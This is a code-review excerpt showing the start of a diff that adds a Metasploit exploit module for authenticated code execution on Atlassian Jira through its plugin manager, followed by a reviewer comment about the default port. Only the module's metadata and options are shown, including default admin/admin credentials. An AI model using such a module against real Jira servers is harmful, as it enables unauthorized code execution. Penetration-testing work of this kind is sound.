modules/exploits/multi/http/jira_plugin_upload.rb

```diff
@@ -0,0 +1,251 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Atlassian Jira Authenticated Upload Code Execution',
+      'Description' => %q{
+        This module can be used to execute a payload on Atlassian Jira via
+        the Universal Plugin Manager(UPM). The module requires valid login
+        credentials to an account that has access to the plugin manager.
+        The payload is uploaded as a JAR archive containing a servlet using
+        a POST request against the UPM component. The check command will
+        test the validity of user supplied credentials and test for access
+        to the plugin manager.
+      },
+      'Author'      => 'Alexander Gonzalez(dubfr33)',
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+        ],
+      'Platform'    => %w[java],
+      'Targets'     =>
+        [
+          ['Java Universal',
+            {
+              'Arch'     => ARCH_JAVA,
+              'Platform' => 'java'
+            }
+          ]
+        ],
+        'DisclosureDate' => 'Feb 22 2018'))
+
+    register_options(
+      [
+        OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),
+        OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),
+        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])
```

Comment:
If the default rport is 2990, I think it should have the option set as the default